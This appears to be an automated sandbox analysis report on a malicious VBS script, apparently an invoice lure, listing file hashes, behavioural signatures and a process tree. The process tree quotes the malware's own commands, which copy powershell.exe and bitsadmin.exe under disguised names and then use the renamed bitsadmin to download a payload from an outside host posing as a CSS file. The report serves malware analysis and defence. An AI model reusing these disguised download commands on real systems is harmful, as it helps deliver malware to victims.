Analysis
-
max time kernel
91s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 15:28
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 00616840120.vbs
Resource
win7-20220414-en
General
-
Target
FattDiffEmessa2020 00616840120.vbs
-
Size
4KB
-
MD5
df040acc717de01627876e0ee3fa86df
-
SHA1
de8d3e73eaa96d6dc3140b63808fd7fa316cdc08
-
SHA256
e96c29490b415926118a9342760a5060070e9dd415aee367cca7a0e5146a45fe
-
SHA512
9f563b9eea761dd6ef02db008a130ac207b2e610067489a29dac9f918cdda9ada9130e3b0e26aafb1653ded52f7080fbf2413fff3321c239db46b69839805db9
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3168 uccBtRT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 5068 wrote to memory of 4420 5068 WScript.exe 80 PID 5068 wrote to memory of 4420 5068 WScript.exe 80 PID 5068 wrote to memory of 4368 5068 WScript.exe 82 PID 5068 wrote to memory of 4368 5068 WScript.exe 82 PID 5068 wrote to memory of 3168 5068 WScript.exe 84 PID 5068 wrote to memory of 3168 5068 WScript.exe 84 PID 5068 wrote to memory of 3168 5068 WScript.exe 84
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 00616840120.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\puccBtRT.exe2⤵PID:4420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\uccBtRT.exe2⤵PID:4368
-
-
C:\Users\Admin\AppData\Roaming\uccBtRT.exe"C:\Users\Admin\AppData\Roaming\uccBtRT.exe" /transfer najtec /download https://nowyouknowent.com/werdona/00616840120/blank.css C:\Users\Admin\AppData\Roaming\blank.css2⤵
- Executes dropped EXE
PID:3168
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a